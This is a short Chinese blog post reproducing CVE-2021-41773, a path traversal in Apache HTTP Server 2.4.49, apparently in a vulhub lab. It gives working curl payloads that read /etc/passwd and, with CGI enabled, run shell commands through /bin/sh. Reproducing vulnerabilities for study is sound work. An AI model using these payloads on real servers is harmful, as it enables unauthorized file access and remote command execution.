漏洞复现|CVE-2021-41773/Apache HTTP Server 路径穿越漏洞
自己的一次简单的漏洞复现记录学习请移步:https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-41773/README.zh-cn.md
- https://httpd.apache.org/security/vulnerabilities_24.html
文章图片
- 影响版本:
=2.4.49
- 利用条件:穿越的目录允许被访问,比如配置了
。(默认情况下是不允许的:Require all granted
)Require all denied
注意:这里的
/icons/
必须是一个存在且可访问的目录payload
curl -v --path-as-is http://your-ip:your-port/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
文章图片
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
文章图片
在服务端开启了
cgi
或cgid
这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令:文章图片
ScriptAlias
与Alias
指令非常相似,都是定义了映射到一个特定目录的URL前缀,两者一般都用于指定位于DocumentRoot
以外的目录,其不同之处是ScriptAlias
又多了一层含义,即URL前缀后面的任何文件都被视为CGI程序
。所以,上述配置会指示Apache任何以/cgi-bin/
开头的资源都将映射到/usr/local/apache2/cgi-bin/
目录中,且视之为CGI程序
。payload
curl --data "echo;
id" 'http://your-ip:your-port/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
文章图片
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/shecho;
cat /etc/passwd
【漏洞复现|CVE-2021-41773/Apache HTTP Server 路径穿越漏洞】
文章图片
推荐阅读
- CVE-2020-16898|CVE-2020-16898 TCP/IP远程代码执行漏洞
- 难道你仅会钻规则的漏洞吗()
- PHP|PHP Everywhere 三个 RCE 漏洞威胁大量 WordPress 网站
- web挖洞|HACK学习黑帽子Python--漏洞检测脚本快速编写
- heap|heap uaf
- s2-045漏洞的复现及其修复
- 墨者学院-CMS系统漏洞分析溯源(第8题)
- 《宁静心态(不断复现知识整体》——宁静致远|《宁静心态:不断复现知识整体》——宁静致远 20200111-今日复盘-401-348)
- Tomcat|Tomcat AJP协议漏洞分析与利用
- Spring Boot 年前最后一个版本发布,一招解决 Log4j2、Logback 漏洞!!